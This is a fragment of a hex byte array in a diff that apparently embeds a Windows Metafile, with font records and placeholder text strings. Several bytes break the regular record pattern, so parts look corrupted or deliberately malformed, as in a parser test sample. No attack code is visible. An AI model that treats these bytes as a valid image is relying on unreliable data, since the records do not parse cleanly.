0x49, 0x00, 0x07, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9F, + 0x0A, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x31, 0x00, 0x01, 0x00, + 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0xB0, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 
0xFF, 0xFF, 0xFF, 0x02, + 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x30, 0x00, 0x00, 0x00, 0x32, 0x0A, + 0xE8, 0x01, 0x37, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x20, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, + 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, + 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x04, 0x00, 0x0C, 0x00, + 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, + 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x32, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x24, 0x00, + 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0x2A, 0x00, 0x13, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00, + 0x07, 0x22, 0x0D, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, + 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0xE9, + 0x0A, 0x00, 0x06, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x7E, 0x01, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xE5, 0xFF, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, + 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, + 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00, + 0x05, 0x00, 
0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0xBE, 0x00, 0x09, 0x00, + 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0D, 0x00, 0x0F, 0x00, + 0x0E, 0x00, 0x0E, 0x00, 0x09, 0x00, 0x0D, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, + 0x00, 0x00, 0xFB, 0x02, 0xED, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, + 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, + 0x08, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, + 0x32, 0x0A, 0x06, 0x02, 0x2D, 0x01, 0x08, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x20, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, + 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0x2A, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, + 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x83, + 0x59, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 
0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, + 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC3, 0x18, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x57, 0x01, 0x00, 0x18, 0x00, 0x00, 0xF2, 0x32, 0x0A, 0x1E, 0x02, + 0x60, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x08, 0x00, 0x05, 0x00, 0x09, 0x00, + 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x32, 0x0A, 0x1E, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, + 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, + 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0xCD, 0x0A, 0x1E, 0x02, 0xBE, 0x00, 0x06, 0x00, 0x00, 0x00, + 0x31, 0x20, 0x77, 0x77, 0x77, 0x77, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x06, 0x00, + 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0xEF, 0x00, + 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 
0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, 0x00, 0x00, + 0x32, 0x0A, 0x1E, 0x02, 0xF4, 0x00, 0x12, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x08, 0x00, 0x0A, 0x00, + 0x0A, 0x00, 0x09, 0x00, 0x09, 0x00, 0x08, 0x00, 0x06, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, + 0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0F, 0x00, 0x09, 0x00, 0x05, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x2A, 0x00, 0x0D, 0x00, + 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, + 0x07, 0x00, 0x0F, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, + 0x08, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x01, 0x00, 0x04, 0x87, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, + 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, + 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x95, 0x00, 0x01, 0x00, 0x00, 0xE0, 0x2D, 0x00, 0x06, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x9F, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0xC6, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 
0x24, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x9B, 0x00, 0x13, 0x00, + 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x77, 0x20, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x04, 0x00, + 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, + 0x09, 0x00, 0x09, 0x00, 0x06, 0x00, 0xB8, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x2A, 0x00, 0x07, 0x00, 0x00, 0x00, 0x4A, 0x4E, + 0x4B, 0x20, 0x3D, 0x20, 0x63, 0x00, 0x0A, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0A, 0x00, + 0x05, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, + 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, + 0x6D, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, + 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, + 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x72, 0x00, 0x05, 0x00, 0x00, 0x00, 0x4A, 0x75, 0x6E, 0x20, + 0x4E, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 
0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x95, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE8, 0x00, + 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x7C, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA9, 0x00, + 0x08, 0x00, 0x00, 0x00, 0x74, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x06, 0x00, 0x09, 0x00, + 0x08, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, + 0xBA, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0x07, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xF1, 0x00, 0x06, 0x00, 0x00, 0x00, 0x6B, 0x69, + 0x74, 0x61, 0x73, 0x65, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x09, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, + 0x81, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0x2A, 0x00, 0x06, 0xEF, + 0x00, 0x00, 0x4D, 0x41, 0x50, 0x4B, 0x20, 0x3D, 0x12, 0x00, 0x0D, 0x00, 0x0C, 0x00, 0x0E, 0x00, + 0x05, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, + 
0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, + 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, + 0x78, 0x00, 0x07, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0F, 0x00, + 0x05, 0x00, 0x06, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, + 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x61, 0x02, 0xBE, 0x00, + 0x11, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x09, 0x00, 0x24, 0x00, 0x06, 0x00, 0x05, 0x00, 0x09, 0x00, + 0x0A, 0x00, 0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, + 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x3C, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x7E, 0x00, 0x00, + 0x32, 0x0A, 0x61, 0x02, 0x49, 0x01, 
0x06, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x7E, 0x0A, 0x00, 0x07, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2D, 0x01, 0x01, 0x00, 0x07, 0x00, 0x00, 0x00, 0x1B, 0x04, 0x84, 0x02, 0x92, 0x03, 0x28, 0x00, + 0xC8, 0x01, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, + 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xEB, 0xFF, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, + 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC1, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x42, 0x00, 0xD2, 0x01, 0x0E, 0x00, + 0x00, 0x00, 0x71, 0x71, 0x71, 0x20, 0x3D, 0x20, 0x71, 0x71, 0x71, 0x71, 0x2F, 0x71, 0x71, 0x71, + 0x13, 0x00, 0x0E, 0x00, 0x11, 0x00, 0x05, 0x00, 0x0D, 0x00, 0x06, 0x00, 0x13, 0x00, 0x0F, 0x00, + 0x0E, 0x00, 0x11, 0x00, 0x06, 0x00, 0x0E, 0x00, 0x0F, 0x00, 0x11, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x1F, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0xD0, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x42, 0x00, 0x96, 0x02, 0x06, 0x00, 
0x00, 0x00, 0x71, 0x71, + 0x71, 0x71, 0x71, 0x71, 0x0C, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x08, 0x00, 0x0A, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x16, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x5B, 0x00, 0xD2, 0x01, 0x0A, 0x00, + 0xD0, 0x00, 0x71, 0x71, 0x71, 0x71, 0x20, 0x3D, 0x20, 0x71, 0x71, 0x71, 0x13, 0x00, 0x0E, 0x00, + 0x11, 0x00, 0x11, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, 0x14, 0x00, 0x0E, 0x00, 0x11, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x7C, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x0A, 0x00, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x5B, 0x00, 0x65, 